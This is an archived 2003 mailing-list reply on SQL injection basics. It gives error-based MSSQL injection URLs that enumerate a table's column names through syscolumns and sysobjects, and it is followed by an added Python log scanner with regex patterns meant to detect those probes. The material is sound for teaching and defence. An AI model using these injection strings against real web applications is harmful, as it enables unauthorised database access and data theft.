Re: SQL Injection Basics

From: NetNinja <netninja(at)hotmail.kg>
Date: Sun Feb 09 2003 - 05:21:46 EST

Hello raul,

Sunday, February 9, 2003, 7:21:47 AM, you wrote:

rjhc> I am pen testing a webapp and am having some problems with SQL injection.

rjhc> The app creates an ODBC error. Is this a guarantee of SQL Injection ?

rjhc> If I use www.victim/test.asp?userid=sfdsd

rjhc> the error is "incorrect syntax near line 28 of test.asp" (or that's the English translation equiv in my case).

try inputtin single quote " ' " and c if it throws back ODBC error.

rjhc> I know the database is called master, and has a table test. What is the syntax I should use ?


well u can try enumerating columns of ur TEST table like this

www.victim/test.asp?userid=' select convert(int,(select top 1 name from syscolumns where id=(select id from sysobjects where name='TEST')))--

this will try to convert nvarchar value to int and throws back error where u will c first column name of ur TEST table. then u proceed further

www.victim/test.asp?userid=' select convert(int,select top 1 name from syscolumns where id=object_id("TEST") and name>'put here column name returned from previous query')--

once u know column names u can try to retrieve data with UNION or with select convert()

something like that...

well u can check out some great papers written by top sql injection ninjas like Kevin Spett, Chris Anley, Cesar Cerrudo and others. interestin to read paypaz. :)
check out owasp.org

rjhc> What are the best freeware and open source tools for testing SQL injection ?
rjhc> I tried WPosion which was OK.

heh, haven't heard of that

rjhc> I also tried WebSleuth (which seems to have gone from GPL to closed source commercial btw). Am I right in saying that the SQL plugin has to connect directly to the database to work ? I can only see port 80 so don't think this will work ?

rjhc> Thanks, Raul.


-- 
Best regards,
 NetNinja                            mailto:netninja@hotmail.kg
Received on Sun Feb 9 12:44:00 2003
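
An added example, not part of the original message: a log check a defender could run to spot the error-based column enumeration described in the reply above. The log layout, rule names, threshold and sample lines are constructed assumptions; the one probe string is the request quoted in the message.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample log (assumed layout: date time method path query status).
SAMPLE_LOG = """\
2003-02-09 10:01:02 GET /test.asp userid=1042 200
2003-02-09 10:01:09 GET /test.asp userid=sfdsd 500
2003-02-09 10:01:15 GET /test.asp userid=%27 500
2003-02-09 10:01:31 GET /test.asp userid=%27+select+convert(int,(select+top+1+name+from+syscolumns+where+id=(select+id+from+sysobjects+where+name=%27TEST%27)))-- 500
2003-02-09 10:02:40 GET /search.asp q=o%27brien 200
"""

# Each rule names one trait of the requests described in the thread.
RULES = {
    "quote_then_sql": re.compile(r"'\s*(select|union)\b", re.I),
    "convert_subselect": re.compile(r"convert\s*\(\s*int\s*,\s*\(?\s*select\b", re.I),
    "catalog_table": re.compile(r"\b(syscolumns|sysobjects)\b", re.I),
    "trailing_comment": re.compile(r"--\s*$"),
}

def score_query(raw_query):
    """Return the sorted names of the rules that match the URL-decoded query."""
    decoded = unquote_plus(raw_query)
    return sorted(name for name, rx in RULES.items() if rx.search(decoded))

def scan(log_text, min_hits=2):
    """Return (timestamp, path, status, hits) for requests matching >= min_hits rules.

    Requiring two rules keeps a lone apostrophe (o'brien) from raising an alert.
    """
    findings = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) != 6:
            continue  # skip lines that do not fit the assumed layout
        date, time, _method, path, query, status = fields
        hits = score_query(query)
        if len(hits) >= min_hits:
            findings.append((f"{date} {time}", path, int(status), hits))
    return findings

if __name__ == "__main__":
    for ts, path, status, hits in scan(SAMPLE_LOG):
        print(f"{ts} {path} status={status} rules={','.join(hits)}")
```

Matching on the decoded query string matters here, since the quote and spaces arrive as `%27` and `+` in the raw log.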

This archive was generated by hypermail 2.1.8 : Wed Aug 23 2006 - 14:07:48 EDT

